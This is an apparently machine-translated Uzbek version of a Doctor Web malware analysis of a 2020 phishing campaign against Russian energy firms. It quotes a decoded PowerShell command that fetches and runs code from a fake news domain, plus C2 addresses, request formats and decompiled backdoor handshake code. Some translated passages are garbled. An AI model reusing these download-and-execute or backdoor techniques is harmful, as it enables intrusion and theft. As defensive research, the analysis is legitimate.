Kompyuter xavfsizligi bilan bog'liq hodisalarni tekshirish bo'yicha tajribamiz shuni ko'rsatadiki, elektron pochta hanuzgacha tajovuzkorlar tomonidan hujum qilingan tarmoq infratuzilmalariga kirish uchun ishlatiladigan eng keng tarqalgan kanallardan biri hisoblanadi. Shubhali (yoki unchalik shubhali bo'lmagan) xat bilan qilingan bitta ehtiyotsizlik harakati keyingi infektsiya uchun kirish nuqtasiga aylanadi, shuning uchun kiberjinoyatchilar turli darajadagi muvaffaqiyatlarga qaramay, ijtimoiy muhandislik usullaridan faol foydalanmoqdalar.
Ushbu postda biz Rossiya yoqilg'i-energetika kompleksidagi bir qator korxonalarga qaratilgan spam-kampaniya bo'yicha yaqinda o'tkazgan tergovimiz haqida gapirmoqchimiz. Barcha hujumlar soxta elektron pochta orqali bir xil stsenariy bo'yicha amalga oshirildi va hech kim bu elektron pochta xabarlarining matn mazmuniga ko'p harakat qilmaganga o'xshaydi.
Razvedka xizmati
Hammasi 2020-yil aprel oyi oxirida, Doctor Web virus tahlilchilari xakerlar Rossiya yoqilg‘i-energetika kompleksidagi bir qator korxonalar xodimlariga yangilangan telefon ma’lumotnomasini yuborgan spam-kampaniyani aniqlagandan keyin boshlandi. Albatta, bu oddiy tashvish namoyishi emas edi, chunki katalog haqiqiy emas edi va .docx hujjatlari masofaviy manbalardan ikkita rasmni yuklab oldi.
Ulardan biri foydalanuvchining kompyuteriga news[.]zannews[.]com serveridan yuklab olindi. E’tiborlisi, domen nomi Qozog‘istonning korruptsiyaga qarshi media markazi – zannews[.]kz domeniga o‘xshaydi. Boshqa tomondan, foydalanilgan domen ICEFOG backdoor-dan foydalangan va nomlarida “yangiliklar” pastki qatorli troyan boshqaruv domenlariga ega bo'lgan TOPNEWS deb nomlanuvchi boshqa 2015-yilgi kampaniyani darhol eslatdi. Yana bir qiziqarli xususiyat shundaki, turli xil qabul qiluvchilarga elektron pochta xabarlarini yuborishda tasvirni yuklab olish so'rovlarida turli xil so'rov parametrlari yoki noyob tasvir nomlaridan foydalanilgan.
Bizning fikrimizcha, bu "ishonchli" adresatni aniqlash uchun ma'lumot to'plash maqsadida qilingan, keyinchalik u xatni kerakli vaqtda ochishi kafolatlanadi. Qabul qilingan hujjatni ochgan xodimlarning kompyuterlaridan NetNTLM xeshlarini yig'ish uchun bajarilishi mumkin bo'lgan ikkinchi serverdan tasvirni yuklab olish uchun SMB protokoli ishlatilgan.
Va soxta katalogga ega bo'lgan xatning o'zi:
Shu yilning iyun oyida xakerlar rasmlarni yuklash uchun sports[.]manhajnews[.]com yangi domen nomidan foydalanishni boshladilar. Tahlil shuni ko'rsatdiki, manhajnews[.]com subdomenlari kamida 2019-yil sentabr oyidan beri spam-xabarlarda ishlatilgan. Ushbu kampaniyaning maqsadlaridan biri Rossiyaning yirik universiteti edi.
Shuningdek, iyun oyiga kelib hujum tashkilotchilari o‘z maktublari uchun yangi matnni o‘ylab topishdi: bu safar hujjatda sanoat rivojlanishi haqidagi ma’lumotlar bor edi. Maktub matnida uning muallifi rus tilida so'zlashuvchi emasligi yoki o'zi haqida ataylab shunday taassurot yaratayotgani aniq ko'rsatilgan. Afsuski, sanoatni rivojlantirish g'oyalari, har doimgidek, shunchaki qopqoq bo'lib chiqdi - hujjat yana ikkita rasmni yuklab oldi, server esa download[.]inklingpaper[.]com ga o'zgartirildi.
Keyingi yangilik iyul oyida paydo bo'ldi. Antivirus dasturlari tomonidan zararli hujjatlarni aniqlashni chetlab o'tishga urinib, tajovuzkorlar parol bilan shifrlangan Microsoft Word hujjatlaridan foydalanishni boshladilar. Shu bilan birga, hujumchilar klassik ijtimoiy muhandislik texnikasidan foydalanishga qaror qilishdi - mukofot haqida xabar berish.
Murojaat matni yana o‘sha uslubda yozilgani murojaat qiluvchida qo‘shimcha shubha uyg‘otdi. Rasmni yuklab olish serveri ham o'zgarmadi.
E'tibor bering, barcha holatlarda xatlarni jo'natish uchun mail[.]ru va yandex[.]ru domenlarida ro'yxatdan o'tgan elektron pochta qutilari ishlatilgan.
Ataka
2020 yil sentyabr oyining boshiga kelib, harakat qilish vaqti keldi. Bizning virus tahlilchilarimiz hujumlarning yangi to'lqinini qayd etishdi, bunda tajovuzkorlar telefon ma'lumotnomasini yangilash bahonasida yana xat jo'natishdi. Biroq, bu safar ilovada zararli makros mavjud edi.
Ilova qilingan hujjatni ochishda makros ikkita fayl yaratdi:
- VBS skripti %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, u ommaviy ish faylini ishga tushirish uchun mo'ljallangan;
- Ommaviy ish faylining oʻzi %APPDATA%configstest.bat, bu noaniq edi.
Uning ishining mohiyati ma'lum parametrlar bilan Powershell qobig'ini ishga tushirishdan iborat. Qobiqga uzatilgan parametrlar buyruqlarga dekodlanadi:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Taqdim etilgan buyruqlardan kelib chiqqan holda, foydali yuk yuklab olingan domen yana yangiliklar sayti sifatida yashiringan. Oddiy , uning yagona vazifasi buyruq va boshqaruv serveridan qobiq kodini olish va uni bajarishdir. Biz jabrlanuvchining shaxsiy kompyuteriga o'rnatilishi mumkin bo'lgan ikki turdagi orqa eshiklarni aniqlay oldik.
BackDoor.Siggen2.3238
Birinchisi BackDoor.Siggen2.3238 — bizning mutaxassislarimiz ilgari duch kelmagan va boshqa antivirus sotuvchilari tomonidan ushbu dastur haqida hech qanday eslatma yo'q edi.
Bu dastur C++ da yozilgan va 32-bitli Windows operatsion tizimlarida ishlaydigan orqa eshikdir.
BackDoor.Siggen2.3238 ikkita protokol yordamida boshqaruv serveri bilan bog'lana oladi: HTTP va HTTPS. Sinov qilingan namuna HTTPS protokolidan foydalanadi. Serverga so'rovlarda quyidagi User-Agent ishlatiladi:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Bunday holda, barcha so'rovlar quyidagi parametrlar to'plami bilan ta'minlanadi:
%s;type=%s;length=%s;realdata=%send
bu yerda har bir satr %s mos ravishda quyidagi bilan almashtiriladi:
- zararlangan kompyuterning identifikatori,
- yuborilayotgan so'rov turi,
- real ma'lumotlar maydonidagi ma'lumotlarning uzunligi,
- ma'lumotlar.
Infektsiyalangan tizim haqida ma'lumot to'plash bosqichida orqa eshik quyidagi qatorni hosil qiladi:
lan=%s;cmpname=%s;username=%s;version=%s;
bu erda lan - zararlangan kompyuterning IP manzili, cmpname - kompyuter nomi, foydalanuvchi nomi - foydalanuvchi nomi, versiya - 0.0.4.03 qator.
Ushbu sysinfo identifikatori bilan ma'lumot POST so'rovi orqali https[:]//31.214[.]157.14/log.txt manzilida joylashgan boshqaruv serveriga yuboriladi. Agar javoban BackDoor.Siggen2.3238 HEART signalini oladi, ulanish muvaffaqiyatli deb hisoblanadi va backdoor server bilan aloqaning asosiy siklini boshlaydi.
Operatsion tamoyillarining to'liq tavsifi BackDoor.Siggen2.3238 bizda mavjud .
BackDoor.Whitebird.23
Ikkinchi dastur - Qozog'istondagi davlat idorasi bilan sodir bo'lgan voqeadan bizga ma'lum bo'lgan BackDoor.Whitebird backdoorning modifikatsiyasi. Ushbu versiya C++ tilida yozilgan va 32 va 64 bitli Windows operatsion tizimlarida ishlashga mo'ljallangan.
Ushbu turdagi dasturlarning aksariyati kabi, BackDoor.Whitebird.23 nazorat serveri bilan shifrlangan ulanishni o'rnatish va zararlangan kompyuterni ruxsatsiz boshqarish uchun mo'ljallangan. Tomizgich yordamida buzilgan tizimga o'rnatilgan .
Biz tekshirgan namuna ikkita eksportga ega zararli kutubxona edi:
- Google Play
- Viktorina.
Ishning boshida u 0x99 bayt bilan XOR operatsiyasiga asoslangan algoritm yordamida orqa eshik korpusiga ulangan konfiguratsiyani shifrlaydi. Konfiguratsiya quyidagicha ko'rinadi:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Uning doimiy ishlashini ta'minlash uchun orqa eshik maydonda ko'rsatilgan qiymatni o'zgartiradi ish_soati konfiguratsiyalar. Maydon 1440 baytni o'z ichiga oladi, ular 0 yoki 1 qiymatlarini oladi va kunning har bir soatining har bir daqiqasini ifodalaydi. Interfeysni tinglaydigan va virusli kompyuterdan proksi-serverda avtorizatsiya paketlarini qidiradigan har bir tarmoq interfeysi uchun alohida oqim yaratadi. Bunday paket aniqlanganda, orqa eshik o'z ro'yxatiga proksi-server haqidagi ma'lumotlarni qo'shadi. Bundan tashqari, WinAPI orqali proksi-server mavjudligini tekshiradi InternetQueryOptionW.
Dastur joriy daqiqa va soatni tekshiradi va uni maydondagi ma'lumotlar bilan taqqoslaydi ish_soati konfiguratsiyalar. Agar kunning mos keladigan daqiqasi uchun qiymat nolga teng bo'lmasa, u holda boshqaruv serveri bilan aloqa o'rnatiladi.
Serverga ulanishni o'rnatish mijoz va server o'rtasida TLS 1.0 versiyasi protokoli yordamida ulanishni yaratishni simulyatsiya qiladi. Orqa eshik korpusida ikkita tampon mavjud.
Birinchi bufer TLS 1.0 Client Hello paketini o'z ichiga oladi.
Ikkinchi buferda kalit uzunligi 1.0x0 bayt bo'lgan TLS 100 Client Key Exchange paketlari, Change Cipher Spec, Encrypted Handshake Message mavjud.
Client Hello paketini yuborayotganda, backdoor Client Random maydoniga joriy vaqtning 4 baytini va 28 bayt psevdotasodifiy ma'lumotlarni yozadi, bu quyidagicha hisoblanadi:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Qabul qilingan paket boshqaruv serveriga yuboriladi. Javob (Server Hello paketi) tekshiradi:
- TLS protokolining 1.0 versiyasiga muvofiqligi;
- mijoz tomonidan ko'rsatilgan vaqt tamg'asi (tasodifiy ma'lumotlar paketi maydonining dastlabki 4 bayti) server tomonidan ko'rsatilgan vaqt tamg'asiga muvofiqligi;
- mijoz va serverning Tasodifiy ma'lumotlar maydonidagi vaqt tamg'asidan keyingi dastlabki 4 baytning mos kelishi.
Belgilangan mos kelsa, orqa eshik Client Key Exchange paketini tayyorlaydi. Buning uchun u Client Key Exchange paketidagi Ochiq kalitni, shuningdek, Encrypted Handshake Message paketidagi Encryption IV va Encryption Datani o‘zgartiradi.
Keyin orqa eshik buyruq va boshqaruv serveridan paketni oladi, TLS protokoli versiyasi 1.0 ekanligini tekshiradi va keyin yana 54 baytni (paketning tanasi) qabul qiladi. Bu ulanishni sozlashni yakunlaydi.
Operatsion tamoyillarining to'liq tavsifi BackDoor.Whitebird.23 bizda mavjud .
Xulosa va xulosalar
Hujjatlar, zararli dasturlar va foydalanilgan infratuzilma tahlili hujum Xitoyning APT guruhlaridan biri tomonidan tayyorlanganligini ishonch bilan aytishga imkon beradi. Muvaffaqiyatli hujum sodir bo'lgan taqdirda qurbonlarning kompyuterlariga o'rnatiladigan orqa eshiklarning funktsional imkoniyatlarini hisobga olsak, infektsiya, hech bo'lmaganda, hujum qilingan tashkilotlarning kompyuterlaridan maxfiy ma'lumotlarni o'g'irlashga olib keladi.
Bundan tashqari, juda mumkin bo'lgan stsenariy - bu maxsus funktsiyaga ega bo'lgan mahalliy serverlarga ixtisoslashtirilgan troyanlarni o'rnatish. Bular domen kontrollerlari, pochta serverlari, Internet shlyuzlari va boshqalar bo'lishi mumkin. Misolda ko'rib turganimizdek , bunday serverlar turli sabablarga ko'ra tajovuzkorlar uchun alohida qiziqish uyg'otadi.
Manba: www.habr.com